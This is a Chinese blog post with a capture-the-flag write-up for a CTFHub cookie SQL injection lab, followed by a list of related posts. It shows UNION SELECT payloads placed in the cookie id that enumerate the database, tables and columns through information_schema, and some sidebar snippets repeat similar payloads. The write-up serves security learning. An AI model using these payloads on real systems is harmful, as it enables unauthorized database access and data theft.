cookie注入(CTFHUB靶场)

原创 已于 2024-12-29 20:42:06 修改 · 1.6k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全

于 2022-09-10 15:34:33 首次发布
本文介绍了Cookie注入的原理,即通过修改本地Cookie来执行非法操作。讲解了注入点判断、字段数探测、数据库爆破等步骤,以实际示例展示了如何利用工具进行测试。同时,强调了因程序员未对Cookie内容过滤导致的安全风险,并提醒开发者加强防护措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

cookie注入的原理:

更改本地的cookie,从而利用cookie来提交非法语句

为什么会产生cookie?

可能是因为程序员没有在cookie中做一些过滤。

cookie注入的流程:

1.先判断有没有注入点。

2.用order by函数来得到字段的总数

3.知道了字段数,我们就可以开始爆破了

4.爆破表明

5.爆破列明

6.得到flag

注入的流程:

我们先用BP对靶场进行抓包,然后将抓到的数据发送到repeater

8c6756d450bf4b95b61b34c4a49d2349.png

因为是cookie注入,所以我们就把注意放在cookie上,发现cookie后面有一个id=1,我们加一个单引号,看看会不会报错

id=1'

5142b331170f95ba2bc0ed6a89b5c16d.png

 

发现报错,存在注入,我们可以查看一下他的字段数,发现等于3的时候会报错,说明字段数等于二,然后我们可以开始暴库了

id=-a union select 1,database()

71cebdb59275ec8600e4637e23b447c9.png

得到数据库为sqli,然后开始爆表

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

b3b53df2baf6d1b6a5d0ef37c36fe8ae.png

尝试一下用gagawesmtx这个表

继续爆字段

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='你的表名'

73cb53207366a2cb2b3e65a091ac1607.png

最终得到flag

5cd27c649379b291d3840cfa5765589e.png

 

 

初夏微凉§
关注
网安知识系列:网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
weixin_54626591的博客
09-12 648
网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
cookie注入
Sea_Sand息禅
12-18 1095
有个靶场上的一道题,只要在id后面进行测试,立马弹窗,得不到任何信息。 这是个很好的WAF过滤,一个asp的网页,所以用cookie注入。 asp网页能用cookie注入,php不能。 (语句执行在url地址栏里,每次注入语句执行后,都要访问对应的asp文件,才会出结果,就是刷新一下就行) javascript:alert(document.cookie="id="+escape("...
CTFHub - Cookie注入
Have_a_great_day的博客
09-10 1160
因为在CTFHubweb内SQL板块使用的是同一个数据库,所以列数是相同的。table_name='gzuhxxtsjy' :选择表名为【gzuhxxtsjy】的表的数据。table_schema=database() :选择当前连接的数据库(sqli)中的所有表。可以发现此处没有【flag】表,取而代之的是【gzuhxxtsjy】,查看该表中的列名。Cookie注入则是一种特定的SQL注入形式,它利用了应用程序中使用的Cookie来进行攻击。【news】表一直都存在,所以第一想法先不考虑此表中的内容。
COOKIE注入攻击
最新发布
Yungoal的博客
06-05 1052
将admin改为abc' union select 1,2,group_concat(schema_name) from information_schema.schemata#​ 是服务器发送到用户浏览器并保存在本地的一小段数据(通常不超过 4KB)。浏览器会在后续请求中自动携带 Cookie,用于实现​。​ 的形式传输,并可以附加多个属性(如过期时间、作用域等)。浏览器在后续请求同一网站时,通过 HTTP 请求头(::->帮助Web站点保存有关访问者的信息。)自动附带该网站的 Cookie
CTFHub-web(cookie注入)
m0_64444909的博客
04-11 5283
文章目录前言一、解题步骤二、使用步骤1.引入库2.读入数据总结 前言 一、解题步骤 (1)题目为cookie注入,我们首先先看一下cookie里的值有没有什么可以帮助我们思考的东西,id=i,很明显存在sql注入 (2)我们抓包来一步步的进行注入会更方便一些 1.我们用order by 语句来排序查询数据库有几行 (1,2都可以回显,直到3时无法回显,说明数据库有两行) id=1 order by 3; 2.接下来用联合查询语句union select语句来注入,从而判断显示位 (回显Data:2 正常)
CTFhub Cookie注入
plant1234的博客
06-18 804
Cookie注入: 首先更具题目启动环境得到: 发现这是cookie注入,于是就利用bp抓包得到: 发现cookie 能传参数,于是传入: 2 1’ 1 and 1=1 1’ and 1=1# 1 and 1=2 得到: 可以看到在1’ ,1’ and 1=1 ,1 and 1=2 出没有回显 在1 and 1=1 处得到正确回显 所以是存在注入的 于是用语句查看字段数: 看到有3报错,所以有两个字段 于是去得到当前库名: 在得到表名: ...
CTFHub | Cookie注入
尼泊罗河伯的博客
11-20 2143
根据网页显示内容提示,这题关于 Cookie 注入Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 中修改其参数进行注入判断,那么直接打开工具 BurpSuite 对题目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
初识CTF Day2 CTFHUB密码口令&SQL注入
suxinAL的博客
09-27 998
前言 接着上次的继续往下做 git泄露结束了,现在开始看svn和hg 正文 首先看一下信息泄露部分的svn和hg 这里使用到一个工具dvcs-ripper 下载地址如下 https://github.com/kost/dvcs-ripper.git (注意:该工具一定要配置环境,具体如下图,或者查看readme.md) 安装好工具就简单了,我是在kali虚拟机里进行使用的 具体指令如下 cd dvcs-ripper-master ./rip-svn.pl -v -u http://challenge-d
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1402
CTFHUB-WEB-SQL注入
2021-7-1sqlmap解决ctfhub的sql部分注入题型
qq_45290991的博客
07-01 345
一、cookie注入 二、UA注入 这个真的很难,sqlmap跑了好久……一直测不出来,,不知道为什么,参数也没错啊…… 三、refer注入 https://www.cnblogs.com/0yst3r-2046/p/12493132.html 可以参考这个,,最后一个类型是真的不想跑了 很卡…… ...
CTFhub信息泄露漏洞实验指导手册
weixin_43401651的博客
09-30 725
环境:Windows2008、Kali Linux靶场CTFhub-信息泄露工具:浏览器:火狐浏览器抓包改包工具:burpsuite信息泄露漏洞利用工具:dirsearch、GitHack、dvcs-ripper、Nmap。
CTFHUB-Cookie注入
Web学习之路
03-28 280
cookie
CTFHub技能树之WEBCookie注入
weixin_48799157的博客
03-20 1736
小白一个,如有错误请指正! 解法一:使用Burpsuite抓包 1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater 2.在Repeater界面发送数据包,发现可以看到返回的数据 3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段 有回显 有回显 没有回显 4.爆数据库 id=123 union select 1,database()# 5.爆表名 id=123 union select 1...
CTFHubCookie注入
sGanYu
07-26 1973
手动注入 什么是cookie? 一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。当用户第一次访问页面的时候,服务器会生成一个用户特有的cookie,之后浏览器会根据用户设置的Cookie信息加载出内容,简单来说,cookie其实就是用户凭证的意思。 sqlmap注入 ...
sql注入预计完全体
2303_81631620的博客
04-04 1038
Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站。
cookie注入靶场
weixin_45540609的博客
04-19 330
id = 169和id=170-1的页面显示相同,说明有sql注入 字段有10个 union select 1,2,3,4,5,6,7,8,9,10 页面对传参进行拦截 设置cookie名称是id,值是170 发现及时url中没有id值,页面也可以回显id=170的页面,说明cookie值可以影响get传参,也许存在cookie注入 用url encode编码下面语句,放入cookie插件中 170 union select 1,2,3,4,5,6,7,8,9,1...
Cookies注入
LoveStarbucks的博客
01-03 374
Cookies注入 1.Cookie介绍 2.Cookie注入代码分析 代码中使用Cookie传递参数,但是没有对Cookie中传递的参数进行过率操作。导致SQL注入漏洞的产生 3.Cookie注入利用 sqli20 利用‘or 1=1 --+输出第一个用户名和密码 4.Sqlmap安全检测 Sqlmap Cookie注入 sqlmap -r target.txt --level 3 --ba...
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值